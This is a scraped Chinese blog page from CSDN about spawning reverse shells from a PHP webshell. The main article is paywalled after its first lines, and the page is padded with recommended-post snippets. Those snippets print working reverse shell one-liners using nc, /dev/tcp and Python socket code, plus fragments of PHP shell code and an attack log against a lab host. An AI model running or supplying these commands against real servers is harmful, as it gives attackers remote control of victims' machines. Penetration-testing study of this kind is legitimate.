PHP Webshell 下的反弹 Shell

最新推荐文章于 2024-08-08 21:06:47 发布

XtAbap

最新推荐文章于 2024-08-08 21:06:47 发布

阅读量528

点赞数

文章标签： php 开发语言

本文链接：https://blog.csdn.net/xtabap/article/details/133664910

版权

php 专栏收录该内容

166 篇文章 7 订阅 ¥59.90 ¥99.00

订阅专栏

本文详细讲解了如何在PHP Webshell下实现反弹Shell的功能，通过编写PHP脚本创建TCP/IP socket，实现与攻击者主机的连接，允许攻击者执行远程命令。虽然示例代码用于教育目的，但实际使用此类技术可能涉及违法行为，提醒读者应注重网络安全和法律合规。

摘要由CSDN通过智能技术生成

Webshell 是一种常见的恶意软件，它允许攻击者通过一个受感染的网站来执行远程命令和控制目标服务器。其中一种常见的攻击技术是通过 Webshell 反弹一个 Shell 连接，以便攻击者能够直接与目标服务器进行交互并执行命令。在本文中，我们将探讨如何在 PHP Webshell 下实现反弹 Shell 的功能。

要实现反弹 Shell，我们需要编写一个 PHP 脚本，该脚本将作为 Webshell 在目标服务器上执行。下面是一个示例代码：

<?php
// 获取远程主机和端口
$host = '攻击者IP地址';
$port = 攻击者监听端口;

// 创建一个 TCP/IP soc

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

XtAbap

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

反弹shell原理与实现

悦分享

08-02

3388

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...

PHP脚本反弹SHELL

10-20

此脚本可以反弹SHELL到指定地址，得到交互交shell

参与评论您还未登录，请先登录后发表或查看评论

php反弹shell脚本

a1_pha的博客

01-24

958

用msfvenom也可以生成反弹shell脚本，但有时候用不了。

常见反弹shell的方法

最新发布

qq_48368964的博客

08-08

1367

nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令，bash 运行后将命令执行结果返回 5555 端口，攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip，port为端口。反弹shell成功后，在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出，其中x.x.x.x均为攻击者ip。

PHP代码实现反弹shell

E1even的博客

08-28

3849

打靶机的时候遇到了，有时候反弹效果失败，下面这个PHP代码基本可以通杀转载至链接：https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(

php反弹,php反弹shell实现代码

weixin_39532754的博客

03-10

492

遇到一个BT的网站，上传php文件成功之后，每访问一次，文件名就会随机改变一次，并且你访问当前文件如果点其他操作项，文件仍然会改名。非常无奈，没想到什么好的办法，后来灵光一闪。放一个php页面，里面可以直接弹回来shell，何况在console下面操作比webshell方便的多，也不会出现超时之类的情况。因为我不怎么懂php，于是就找了猥琐的诺诺和小雨修改了一下代码，反弹代码是从phpsp...

php反弹shell代码,反弹shell.php

weixin_31491381的博客

03-29

626

function which($pr){$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);}elseif...

PHP反弹shell

痴人说梦梦中人

09-26

7528

步骤详解：前提： ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问（即执行代码才能反弹shell）。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444，即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...

php反弹shell实现代码

10-30

遇到一个BT的网站，上传php文件成功之后，每访问一次，文件名就会随机改变一次，并且你访问当前文件如果点其他操作项，文件仍然会改名。

Php shell端口反弹,Linux下通过webshell反弹shell总结

weixin_33253503的博客

03-12

444

反弹shell原因：Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令，但是溢出必须在可交互环境运行，否则如果直接在WebShell执行，即使能溢出提权成功，也没法利用。因此必须要反弹一个Shell命令行窗口，在命令行终端下执行溢出进行提权。nc命令参数：参　　数：-g设置路由器跃程通信网关，最丢哦可设置8个。-G设置来源路由指向器，其数值为...

webshell反弹工具包

01-25

成套web反弹工具包，包含控制端，被控端。和端口监听工具，配套详细的使用说明

反弹Shell，看这一篇就够了

Appleteachers的博客

04-24

1259

前言在渗透测试实战中，我们经常会遇到Linux系统环境，而让Linux主机反弹个shell是再常见不过的事情了。反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。正向连接假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。反向连接那么为什么要用反弹shell呢

shell tr 替换空格_利用PHP imap反弹shell

weixin_39731456的博客

12-08

157

imap为什么可以？php imap扩展用于在PHP中执行邮件收发操作，它可以通过这种协议从邮件服务器上获取邮件的信息。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说，在debian系列系统中，执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-o ProxyCommand来调用第三方命...

可解析PHP的反弹shell方法

无

06-14

857

这里拿vulnhub-DC-8靶场反弹shell，详情见。

实战攻击-php反弹shell

网络安全领域优质创作者

11-05

3613

以下均为实际攻击过程，记录笔记，仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接，选择线程，使用字典，选择字典，设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录得到http://10.11.1.8/internal/ 目录，查看源码发现/internal/advanced_c...

php反弹教程,详解NC反弹shell的几种方法

weixin_39625586的博客

04-02

1008

假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统，ip为：192.168.0.4，开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令，然后kali上再进行nc监听，即可反弹s...

反弹shell脚本

Soul Blog

11-23

3253

反弹shell及其脚本一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-

php命令执行反弹nc,详解NC反弹shell的几种方法

weixin_32187037的博客

04-04

1746

php反弹,php一句话反弹bash shell

weixin_36361396的博客

03-10

192

OpenCV2+入门系列(四)：计算图像的直方图，平均灰度，灰度方差本篇懒得排版,直接在网页html编辑器编辑在图像处理时,我们常常需要求出图像的直方图.灰度平均值.灰度的方差,这里给出一个opencv2+自带程序,实现这些功能. 直方图对于直方图,使用cv::c ...ARM9的中断控制器简要复习一下ARM9中断控制器的控制过程: 1.首先能识别触发的中断(对应中断源必须打...

webshell 和getshell区别

07-11

Webshell和Getshell是两个常用的黑客术语，分别表示通过不同的方式获取对目标服务器的控制权限。 Webshell指的是将一段可执行的代码上传至目标服务器，通过访问该代码来获取服务器的控制权限。这段代码通常是以脚本或者程序的形式存在，可以被放置在服务器的Web目录下，或者通过其他漏洞上传至服务器。Webshell常用于管理目标服务器、执行系统命令、查看、修改或删除文件等操作。 Getshell则是通过利用漏洞或者其他手段，获取对目标服务器的系统级权限。与Webshell不同的是，Getshell更侧重于直接获取对服务器操作系统的控制权限，而不仅仅是Web应用的控制权限。一旦成功Getshell，黑客可以执行更高级的操作，例如创建用户、修改配置文件、安装后门等，并且可以长期保持对服务器的控制。总结起来，Webshell是指通过上传可执行代码获取Web应用的控制权限，而Getshell则是指通过利用漏洞或其他手段，获取整个服务器的控制权限。